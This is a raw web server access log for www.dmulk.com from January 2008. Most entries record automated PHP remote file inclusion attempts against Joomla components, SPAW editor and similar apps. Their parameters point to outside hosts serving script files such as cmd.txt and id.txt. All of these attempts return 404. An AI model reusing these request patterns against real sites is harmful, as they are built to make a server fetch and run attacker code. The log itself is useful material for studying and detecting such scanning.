67.19.217.130 - - [02/Jan/2008:13:25:00 -0800] "GET /modifyform.html?code=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [02/Jan/2008:13:25:00 -0800] "GET /logs/modifyform.html?code=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.234.6 - - [02/Jan/2008:13:27:06 -0800] "GET //skin/zero_vote/error.php?dir=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.44.234.6 - - [02/Jan/2008:13:27:07 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
201.6.118.136 - - [02/Jan/2008:13:28:52 -0800] "GET /logs/access_071220.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.6.118.136 - - [02/Jan/2008:13:28:58 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.6.118.136 - - [02/Jan/2008:13:29:03 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.6.118.136 - - [02/Jan/2008:13:29:39 -0800] "GET /logs/access_071220.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.6.118.136 - - [02/Jan/2008:13:29:45 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.6.118.136 - - [02/Jan/2008:13:29:50 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.11.122.72 - - [02/Jan/2008:13:30:55 -0800] "GET /logs//login.php?dir=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
66.11.122.72 - - [02/Jan/2008:13:30:55 -0800] "GET //login.php?dir=http://www.colon.gob.mx/ec? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
201.6.118.136 - - [02/Jan/2008:13:31:41 -0800] "GET /logs/access_071212.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.6.118.136 - - [02/Jan/2008:13:32:13 -0800] "GET /logs/access_071212.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.55.209.207 - - [02/Jan/2008:13:32:46 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [02/Jan/2008:13:32:46 -0800] "GET /presto/?S=D HTTP/1.0" 200 510 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.22.126 - - [02/Jan/2008:13:33:46 -0800] "GET /logs/access_070915.log HTTP/1.0" 200 65779 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.137 - - [02/Jan/2008:13:33:49 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.188.218.110 - - [02/Jan/2008:13:34:34 -0800] "GET /logs/access_071224.log/akocomments.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.188.218.110 - - [02/Jan/2008:13:34:34 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:13:35:00 -0800] "GET /logs/access_071214.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://tunes4toys.com/skins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:13:35:00 -0800] "GET //calendar//tools/send_reminders.php?noSet=0&includedir=http://tunes4toys.com/skins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:13:35:00 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://tunes4toys.com/skins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.217.130 - - [02/Jan/2008:13:42:02 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:13:44:48 -0800] "GET /logs/access_071220.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://tunes4toys.com/skins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.217.130 - - [02/Jan/2008:13:45:35 -0800] "GET /convert/mvcw.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.217.130 - - [02/Jan/2008:13:45:36 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:13:45:50 -0800] "GET /logs/access_071214.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://tunes4toys.com/skins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:13:45:50 -0800] "GET //calendar//tools/send_reminders.php?noSet=0&includedir=http://tunes4toys.com/skins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:13:45:51 -0800] "GET /logs//calendar//tools/send_reminders.php?noSet=0&includedir=http://tunes4toys.com/skins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [02/Jan/2008:13:51:09 -0800] "GET /logs/access_071220.log//calendar//tools/send_reminders.php?noSet=0&includedir=http://tunes4toys.com/skins/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:13:53:36 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.157 - - [02/Jan/2008:13:54:19 -0800] "GET /tmp/sess_29e7439fd5f74f974aea6887d22a65ea HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.21 - - [02/Jan/2008:13:58:30 -0800] "GET /tmp/sess_f80d20e09ebe77dd8b7f68d7fef7c6b0 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:13:59:31 -0800] "GET /admin.php?vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:14:01:31 -0800] "GET /logs/access_071224.log/vwar/admin/admin.php?vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:14:01:32 -0800] "GET /vwar/admin/admin.php?vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:14:01:32 -0800] "GET /logs/vwar/admin/admin.php?vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:14:02:11 -0800] "GET //admin/admin.php?vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.123.181 - - [02/Jan/2008:14:02:50 -0800] "GET /logs/access_071212.log/spaw_control.class.php?spaw_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.123.181 - - [02/Jan/2008:14:02:50 -0800] "GET /spaw_control.class.php?spaw_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.123.181 - - [02/Jan/2008:14:02:50 -0800] "GET /logs/spaw_control.class.php?spaw_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [02/Jan/2008:14:02:52 -0800] "GET /logs/access_071212.log/spaw_control.class.php?spaw_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [02/Jan/2008:14:02:57 -0800] "GET /spaw_control.class.php?spaw_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [02/Jan/2008:14:03:02 -0800] "GET /logs/spaw_control.class.php?spaw_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.202.123.181 - - [02/Jan/2008:14:03:12 -0800] "GET /spaw_control.class.php?spaw_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.123.181 - - [02/Jan/2008:14:03:35 -0800] "GET /logs/access_071218.log/spaw_control.class.php?spaw_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [02/Jan/2008:14:03:37 -0800] "GET /logs/access_071218.log/spaw_control.class.php?spaw_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:14:04:44 -0800] "GET /logs/access_071224.log/modules/vwar/admin/admin.php?vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:14:04:44 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [02/Jan/2008:14:05:14 -0800] "GET /spaw_control.class.php?spaw_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.13 - - [02/Jan/2008:14:06:34 -0800] "GET /logs/access_071224.log//skin/zero_vote/error.php?dir=http://www.darkmindz.com/rfi_list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.101.13 - - [02/Jan/2008:14:06:35 -0800] "GET //skin/zero_vote/error.php?dir=http://www.darkmindz.com/rfi_list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.101.13 - - [02/Jan/2008:14:06:35 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.darkmindz.com/rfi_list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.101.13 - - [02/Jan/2008:14:07:50 -0800] "GET /logs/access_071218.log//skin/zero_vote/error.php?dir=http://www.darkmindz.com/rfi_list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.202.123.181 - - [02/Jan/2008:14:08:09 -0800] "GET /displayCategory.php?basepath=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [02/Jan/2008:14:10:00 -0800] "GET /displayCategory.php?basepath=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.202.123.181 - - [02/Jan/2008:14:11:17 -0800] "GET /logs/access_071224.log/displayCategory.php?basepath=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.123.181 - - [02/Jan/2008:14:11:17 -0800] "GET /displayCategory.php?basepath=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.202.123.181 - - [02/Jan/2008:14:11:17 -0800] "GET /logs/displayCategory.php?basepath=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [02/Jan/2008:14:12:13 -0800] "GET /logs/access_071224.log/displayCategory.php?basepath=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [02/Jan/2008:14:12:13 -0800] "GET /displayCategory.php?basepath=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [02/Jan/2008:14:12:13 -0800] "GET /logs/displayCategory.php?basepath=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.14.236 - - [02/Jan/2008:14:12:59 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.14.236 - - [02/Jan/2008:14:12:59 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:14:13:30 -0800] "GET /logs/access_071224.log//admin/admin.php?vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:14:13:30 -0800] "GET /logs//admin/admin.php?vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:14:14:14 -0800] "GET /logs/access_071224.log/admin.php?vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.72.181 - - [02/Jan/2008:14:14:14 -0800] "GET /logs/admin.php?vwar_root=http://bangalorebaazee.com/backup/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.204.25.2 - - [02/Jan/2008:14:14:27 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://www.xbox.com/en-US/games/m/mystIIIexile/details.page/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
85.17.3.183 - - [02/Jan/2008:14:14:42 -0800] "GET /logs/access_071219.log/http://www.google.com.tr/search?q=%22Segue+v.%22%2B%22Middlebury+College%22&hl=tr&start=0&sa=Nhttp://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [02/Jan/2008:14:14:42 -0800] "GET /http://www.google.com.tr/search?q=%22Segue+v.%22%2B%22Middlebury+College%22&hl=tr&start=0&sa=Nhttp://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [02/Jan/2008:14:14:43 -0800] "GET /logs/http://www.google.com.tr/search?q=%22Segue+v.%22%2B%22Middlebury+College%22&hl=tr&start=0&sa=Nhttp://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.109.29.100 - - [02/Jan/2008:14:17:13 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.14.236 - - [02/Jan/2008:14:21:31 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.14.236 - - [02/Jan/2008:14:21:32 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.14.236 - - [02/Jan/2008:14:21:36 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.88.14.236 - - [02/Jan/2008:14:21:36 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.126 - - [02/Jan/2008:14:21:41 -0800] "GET /minamijewelry/kanji1.psd HTTP/1.0" 200 515148 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071102 BonEcho/2.0.0.4" "www.dmulk.com"
65.204.25.2 - - [02/Jan/2008:14:22:48 -0800] "GET /presto/ HTTP/1.1" 200 526 "http://www.xbox.com/en-US/games/m/mystIIIexile/details.page/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
65.204.25.2 - - [02/Jan/2008:14:22:54 -0800] "GET / HTTP/1.1" 200 2962 "http://www.dmulk.com/presto/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:14:23:00 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:14:23:01 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:14:23:01 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:14:23:08 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:14:23:08 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.95.114 - - [02/Jan/2008:14:23:08 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.137.33 - - [02/Jan/2008:14:28:08 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.66.61 - - [02/Jan/2008:14:31:02 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.66.61 - - [02/Jan/2008:14:31:04 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.3.183 - - [02/Jan/2008:14:33:49 -0800] "GET /logs/access_071212.log/administrator/components/com_jreactions/langset.php?comPath=http://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [02/Jan/2008:14:33:50 -0800] "GET /administrator/components/com_jreactions/langset.php?comPath=http://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.3.183 - - [02/Jan/2008:14:33:50 -0800] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://www.richmondcitywatch.com/albums_g2/locks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:39:50 -0800] "GET /logs/access_071220.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.madinaedu.gov.sa/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:39:50 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.madinaedu.gov.sa/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:39:50 -0800] "GET /logs/access_071220.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:39:50 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.madinaedu.gov.sa/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:39:50 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:39:50 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:39:57 -0800] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:39:57 -0800] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.madinaedu.gov.sa/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.20 - - [02/Jan/2008:14:40:12 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.20 - - [02/Jan/2008:14:40:12 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:41:15 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:41:15 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:41:15 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.20 - - [02/Jan/2008:14:41:15 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.20 - - [02/Jan/2008:14:41:16 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:41:16 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.madinaedu.gov.sa/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:41:16 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.madinaedu.gov.sa/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:41:17 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.madinaedu.gov.sa/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:41:35 -0800] "GET /logs/access_071212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:41:36 -0800] "GET /logs/access_071212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.madinaedu.gov.sa/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.168.186 - - [02/Jan/2008:14:42:23 -0800] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.21.78.60 - - [02/Jan/2008:14:42:23 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
